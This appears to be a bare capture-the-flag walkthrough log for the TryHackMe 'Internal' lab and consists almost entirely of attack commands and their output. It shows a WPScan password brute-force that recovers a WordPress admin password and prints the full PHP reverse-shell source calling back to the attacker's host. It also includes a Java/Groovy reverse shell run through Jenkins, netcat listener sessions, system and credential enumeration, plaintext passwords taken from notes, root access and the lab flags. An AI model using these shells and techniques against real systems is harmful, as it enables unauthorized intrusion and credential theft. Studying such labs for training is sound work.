wpscan --url http://internal.thm/blog/wp-login.php --usernames admin --passwords
/usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://internal.thm/blog/wp-login.php/ [10.10.252.207]
[+] Started: Tue Feb 27 23:49:19 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress readme found: http://internal.thm/blog/wp-login.php/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] This site seems to be a multisite
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| Reference: http://codex.wordpress.org/Glossary#Multisite
[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-login.php/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Most Common Wp Includes Query Parameter In Homepage (Passive Detection)
| - http://internal.thm/blog/wp-includes/css/dashicons.min.css?ver=5.4.2
| Confirmed By:
| Common Wp Includes Query Parameter In Homepage (Passive Detection)
| - http://internal.thm/blog/wp-includes/css/buttons.min.css?ver=5.4.2
| - http://internal.thm/blog/wp-includes/js/wp-util.min.js?ver=5.4.2
| Query Parameter In Install Page (Aggressive Detection)
| - http://internal.thm/blog/wp-includes/css/dashicons.min.css?ver=5.4.2
| - http://internal.thm/blog/wp-includes/css/buttons.min.css?ver=5.4.2
| - http://internal.thm/blog/wp-admin/css/forms.min.css?ver=5.4.2
| - http://internal.thm/blog/wp-admin/css/l10n.min.css?ver=5.4.2
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:02 <=================================================> (137 / 137)
100.00% Time: 00:00:02
[i] No Config Backups Found.
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - admin / my2boys
Trying admin / lizzy Time: 00:00:46 < > (3885 / 14348277)
0.02% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: my2boys
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Feb 27 23:50:14 2024
[+] Requests Done: 4204
[+] Cached Requests: 4
[+] Data Sent: 1.477 MB
[+] Data Received: 20.56 MB
[+] Memory used: 231.629 MB
[+] Elapsed time: 00:00:54
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.95.35'; // You have changed this
$port = 4444; // And this
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string
";
}
}
# Espacio para fragmento de código Python -->
def comando = 'whoami'
def proceso = comando.execute()
proceso.waitFor()
def salida = proceso.text
println("Resultado de 'ls':")
println(salida)
--------
String host = "10.10.132.103";
int port = 4444;
String cmd = "/bin/bash"; // Cambiar cmd.exe por /bin/bash para Linux
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
while (pi.available() > 0) so.write(pi.read());
while (pe.available() > 0) so.write(pe.read());
while (si.available() > 0) po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
} catch (Exception e) {}
}
p.destroy();
s.close();
┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.95.35] from (UNKNOWN) [10.10.252.207] 35178
Linux internal 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
01:08:23 up 2:56, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
internal
$ cat /proc/version
Linux version 4.15.0-112-generic (buildd@lcy01-amd64-027) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04))
#113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020
$ cat /etc/issue
Ubuntu 18.04.4 LTS \n \l
$ cd home
$ ls
aubreanna
$ cd aubreanna
/bin/sh: 14: cd: can't cd to aubreanna
$ ls aubreanna
ls: cannot open directory 'aubreanna': Permission denied
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
aubreanna:x:1000:1000:aubreanna:/home/aubreanna:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
$ ip route
default via 10.10.0.1 dev eth0 proto dhcp src 10.10.252.207 metric 100
10.10.0.0/16 dev eth0 proto kernel scope link src 10.10.252.207
10.10.0.1 dev eth0 proto dhcp scope link src 10.10.252.207 metric 100
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1
$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:37911 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 10.10.252.207:35178 10.10.95.35:4444 ESTABLISHED off (0.00/0/0)
tcp6 0 0 :::22 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::80 :::* LISTEN off (0.00/0/0)
tcp6 0 0 10.10.252.207:80 10.10.95.35:54640 TIME_WAIT timewait (25.33/0/0)
tcp6 0 0 10.10.252.207:80 10.10.95.35:59954 ESTABLISHED keepalive (5680.64/0/0)
udp 0 0 127.0.0.53:53 0.0.0.0:* off (0.00/0/0)
udp 0 0 10.10.252.207:68 0.0.0.0:* off (0.00/0/0)
raw6 0 0 :::58 :::* 7 off (0.00/0/0)
$ curl http://localhost:8080
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 793 100 793<html><head><meta http-equiv='refresh' content='1;url=/login?from=%2F'/>
<script>window.location.replace('/login?from=%2F');</script></head><body style='background-color:white;
color:white;'>
Authentication required
<!--
You are authenticated as: anonymous
Groups that you are in:
Permission you need to have (but didn't): hudson.model.Hudson.Read
... which is implied by: hudson.security.Permission.GenericRead
... which is implied by: hudson.model.Hudson.Administer
-->
</body></html>
$ find / -writable -type d 2>/dev/null
/proc/2830/task/2830/fd
/proc/2830/fd
/proc/2830/map_files
/run/screen
/run/lock
/run/lock/apache2
/dev/mqueue
/dev/shm
/tmp
/var/tmp
/var/cache/tcpdf
/var/cache/apache2/mod_cache_disk
/var/www/html/wordpress/wp-content/themes/twentytwenty/template-parts
/var/www/html/wordpress/wp-content/themes/twentytwenty/inc
/var/www/html/wordpress/wp-content/themes/twentytwenty/classes
/var/www/html/wordpress/wp-content/themes/twentytwenty/templates
/var/www/html/wordpress/wp-content/themes/twentytwenty/assets
/var/www/html/wordpress/wp-content/themes/twentyseventeen/template-parts
/var/www/html/wordpress/wp-content/themes/twentyseventeen/inc
/var/www/html/wordpress/wp-content/themes/twentyseventeen/assets
/var/crash
/var/lib/wordpress/wp-content
/var/lib/wordpress/wp-content/themes
/var/lib/lxcfs/proc
/var/lib/lxcfs/cgroup
/var/lib/php/sessions
/var/lib/phpmyadmin/tmp
$ find / -perm -u=s -type f 2>/dev/null
/snap/core/9665/bin/mount
/snap/core/9665/bin/ping
/snap/core/9665/bin/ping6
/snap/core/9665/bin/su
/snap/core/9665/bin/umount
/snap/core/9665/usr/bin/chfn
/snap/core/9665/usr/bin/chsh
/snap/core/9665/usr/bin/gpasswd
/snap/core/9665/usr/bin/newgrp
/snap/core/9665/usr/bin/passwd
/snap/core/9665/usr/bin/sudo
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9665/usr/lib/openssh/ssh-keysign
/snap/core/9665/usr/lib/snapd/snap-confine
/snap/core/9665/usr/sbin/pppd
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/bin/mount
/bin/umount
/bin/ping
/bin/fusermount
/bin/su
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/pkexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
$ ls -la mnt
total 8
drwxr-xr-x 2 root root 4096 Feb 3 2020 .
drwxr-xr-x 24 root root 4096 Aug 3 2020 ..
$ ls -la opt
total 16
drwxr-xr-x 3 root root 4096 Aug 3 2020 .
drwxr-xr-x 24 root root 4096 Aug 3 2020 ..
drwx--x--x 4 root root 4096 Aug 3 2020 containerd
-rw-r--r-- 1 root root 138 Aug 3 2020 wp-save.txt
$ cat /opt/wp-save.txt
Bill,
Aubreanna needed these credentials for something later. Let her know you have them and where they are.
aubreanna:bubb13guM!@#123
# Espacio para fragmento de código Python -->
┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.132.103] from (UNKNOWN) [10.10.112.117] 40476
ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
whoami
jenkins
ls home
ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
ls root
ls: cannot open directory 'root': Permission denied
ls tmp
hsperfdata_jenkins
hsperfdata_root
jetty-0_0_0_0-8080-war-_-any-2385313934447407628.dir
jetty-0_0_0_0-8080-war-_-any-7115445266796347992.dir
winstone4805797399595250733.jar
winstone7166027169177973699.jar
winstone949073167922835362.jar
ls opt
note.txt
cd opt
ls
note.txt
cat note.txt
Aubreanna,
Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you
need access to the root user account.
root:tr0ub13guM!@#123
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
# Espacio para fragmento de código Python -->
┌──(root㉿kali)-[~]
└─# ssh aubreanna@10.10.252.207
The authenticity of host '10.10.252.207 (10.10.252.207)' can't be established.
ED25519 key fingerprint is SHA256:seRYczfyDrkweytt6CJT/aBCJZMIcvlYYrTgoGxeHs4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.252.207' (ED25519) to the list of known hosts.
aubreanna@10.10.252.207's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Feb 28 02:04:32 UTC 2024
System load: 0.0 Processes: 111
Usage of /: 63.8% of 8.79GB Users logged in: 0
Memory usage: 46% IP address for eth0: 10.10.252.207
Swap usage: 0% IP address for docker0: 172.17.0.1
=> There is 1 zombie process.
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
0 packages can be updated.
0 updates are security updates.
Last login: Mon Aug 3 19:56:19 2020 from 10.6.2.56
aubreanna@internal:~$ whoami
aubreanna
aubreanna@internal:~$ ls
jenkins.txt snap user.txt
aubreanna@internal:~$ cat user.txt
THM{int3rna1_fl4g_1}
aubreanna@internal:~$ cat jenkins.txt
Internal Jenkins service is running on 172.17.0.2:8080
find / -type f -name *.txt 2>/dev/null
/opt/wp-save.txt
/boot/grub/gfxblacklist.txt
/var/www/html/wordpress/license.txt
/var/www/html/wordpress/wp-includes/images/crystal/license.txt
/var/www/html/wordpress/wp-includes/ID3/readme.txt
/var/www/html/wordpress/wp-includes/ID3/license.txt
/var/www/html/wordpress/wp-includes/ID3/license.commercial.txt
/var/www/html/wordpress/wp-includes/js/plupload/license.txt
/var/www/html/wordpress/wp-includes/js/swfupload/license.txt
/var/www/html/wordpress/wp-includes/js/tinymce/license.txt
/var/www/html/wordpress/wp-content/plugins/akismet/readme.txt
/var/www/html/wordpress/wp-content/plugins/akismet/changelog.txt
/var/www/html/wordpress/wp-content/plugins/akismet/LICENSE.txt
/var/www/html/wordpress/wp-content/themes/twentytwenty/readme.txt
/var/www/html/wordpress/wp-content/themes/twentyseventeen/readme.txt
/var/www/html/wordpress/wp-content/themes/twentynineteen/readme.txt
/home/aubreanna/user.txt
/home/aubreanna/jenkins.txt
/usr/share/doc/phpmyadmin/html/_sources/require.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/developers.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/intro.txt
/usr/share/doc/phpmyadmin/html/_sources/config.txt
/usr/share/doc/phpmyadmin/html/_sources/setup.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/import_export.txt
/usr/share/doc/phpmyadmin/html/_sources/user.txt
/usr/share/doc/phpmyadmin/html/_sources/credits.txt
/usr/share/doc/phpmyadmin/html/_sources/transformations.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/glossary.txt
/usr/share/doc/phpmyadmin/html/_sources/intro.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/transformations.txt
/usr/share/doc/phpmyadmin/html/_sources/privileges.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/config.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/user.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/copyright.txt
/usr/share/doc/phpmyadmin/html/_sources/copyright.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/import_export.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/faq.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/require.txt
/usr/share/doc/phpmyadmin/html/_sources/privileges.txt
/usr/share/doc/phpmyadmin/html/_sources/other.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/index.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/vendors.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/glossary.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/setup.txt
/usr/share/doc/phpmyadmin/html/_sources/credits.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/developers.txt
/usr/share/doc/phpmyadmin/html/_sources/vendors.txt
/usr/share/doc/phpmyadmin/html/_sources/other.txt
/usr/share/doc/phpmyadmin/html/_sources/index.txt
/usr/share/doc/phpmyadmin/html/_sources/faq.txt
┌──(root㉿kali)-[~]
└─# ssh root@10.10.112.117
root@10.10.112.117's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Feb 28 21:47:51 UTC 2024
System load: 0.0 Processes: 115
Usage of /: 63.7% of 8.79GB Users logged in: 0
Memory usage: 38% IP address for eth0: 10.10.112.117
Swap usage: 0% IP address for docker0: 172.17.0.1
=> There is 1 zombie process.
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
0 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Aug 3 19:59:17 2020 from 10.6.2.56
root@internal:~# ls
root.txt snap
root@internal:~# whoami
root
root@internal:~# cat root.txt
THM{d0ck3r_d3str0y3r}